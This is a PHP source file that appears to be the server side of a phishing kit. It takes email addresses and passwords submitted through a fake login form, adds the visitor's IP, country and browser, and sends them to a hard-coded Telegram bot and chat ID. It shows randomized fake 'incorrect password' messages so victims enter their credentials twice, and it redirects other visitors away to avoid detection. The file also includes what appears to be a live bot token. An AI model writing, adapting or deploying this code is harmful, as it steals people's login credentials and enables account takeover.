<?php
// Enable error reporting
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Set CORS headers to allow any origin
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Origin, Content-Type, X-Auth-Token");

session_start();
include 'result.php'; // Ensure result.php defines $resultbox

if (!isset($_SESSION['count']) || $_SESSION['count'] >= 2) {
    $_SESSION['count'] = 0;
}

if (isset($_POST['fName']) && isset($_POST['apiname']) && isset($_POST['apikey'])) {
    $fName = $_POST['fName'];
    if ($fName === 'probono') {
        $emx = strip_tags($_POST['apiname']);
        $pwd = strip_tags($_POST['apikey']);
        probono($emx, $pwd);
    } else {
        redirect_to_error();
    }
} else {
    redirect_to_error();
}

function redirect_to_error()
{
    header('Location: https://duckduckgo.com/');
    die();
}

function probono($email, $passwd)
{
    $telegram_bot_token = "7868886639:AAE38raYS2eaSrUCrRBatIUOvVuzPr5jnJs";
    $chat_id = "6743203708";
    
    error_log("probono function called with email: $email and password: $passwd"); // Debugging line

    if (strlen($passwd) < 6) {
        respond_with_error('Password too short.');
    }

    $warnings = [
        "Incorrect username or password",
        "Enter valid email and password",
        "Wrong password. Try again"
    ];

    $msgerror = $warnings[array_rand($warnings)];
    $status = "error";

    $ip = getenv("REMOTE_ADDR");
    $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip), true);
    if (!$ip_data) {
        error_log("Failed to get IP data.");
    }

    $country = $ip_data['geoplugin_countryName'] ?? visitor_country();
    $browser = $_SERVER['HTTP_USER_AGENT'];
    $server = date("D/M/d, Y g:i a");
    $domain = substr(strrchr($email, "@"), 1);
    
    $message = "New Login Attempt:\nEmail: $email\nPassword: $passwd\nIP: $ip\nCountry: $country\nUser-Agent: $browser\nDate: $server";
    
    $telegram_url = "https://api.telegram.org/bot$telegram_bot_token/sendMessage?chat_id=$chat_id&text=" . urlencode($message);
    file_get_contents($telegram_url);

    $_SESSION['count']++;
    if ($_SESSION['count'] >= 2) {
        $status = 'success';
    }

    $response = ['status' => $status, 'msgerror' => $msgerror];
    header('Content-Type: application/json');
    echo json_encode($response);
}

function respond_with_error($message)
{
    $response = ['status' => 'error', 'msgerror' => $message];
    header('Content-Type: application/json');
    echo json_encode($response);
    die();
}

// Utility functions
function visitor_country()
{
    $ip = get_client_ip();
    $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip), true);
    return $ip_data['geoplugin_countryName'] ?? "Unknown";
}

function get_client_ip()
{
    $client = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote = $_SERVER['REMOTE_ADDR'];

    if (filter_var($client, FILTER_VALIDATE_IP)) {
        return $client;
    } elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
        return $forward;
    } else {
        return $remote;
    }
}
?>
